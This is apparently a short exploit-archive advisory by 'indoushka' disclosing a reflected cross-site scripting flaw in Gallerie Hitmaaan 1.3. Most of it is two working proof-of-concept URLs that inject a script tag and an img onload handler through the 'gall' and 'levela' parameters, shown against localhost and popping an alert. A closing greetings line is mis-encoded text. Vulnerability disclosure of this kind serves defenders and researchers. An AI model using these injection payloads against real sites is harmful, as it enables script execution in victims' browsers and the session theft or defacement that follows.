Gallerie Hitmaaan version 1.3 suffers from a cross site scripting vulnerability.
07de807bd798aeb6ebb57976b361c17b168f56b1a43e870cee86c5ee6f3e1f09
========================================================================================
| # Title : Gallerie Hitmaaan 1.3 Cross Site Scripting Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
| # Web Site : www.iq-ty.com
| # Script : Powered by Hitmaaan
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka =================================
# Exploit :
1- http://127.0.0.1/1367_hitmaaan-13/?gall=fonds&levela=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
2- http://127.0.0.1/1367_hitmaaan-13/?gall=<img+src=http://127.0.0.1./Utilisateur.gif+onload=alert(213771818860)>&levela=indoushka@hotmail.com&num_page=1
================================ Dz-Ghost Team ========================================
Greetz : ÓíÏí ÈáÚÈÇÓ + Úíä ÇáÈÑÏ + ÔáÛæã ÇáÚíÏ K10 + K@MEL + Úíä ãáíáÉ + ÊÛäíÝ
-------------------------------------------------------------------------------------------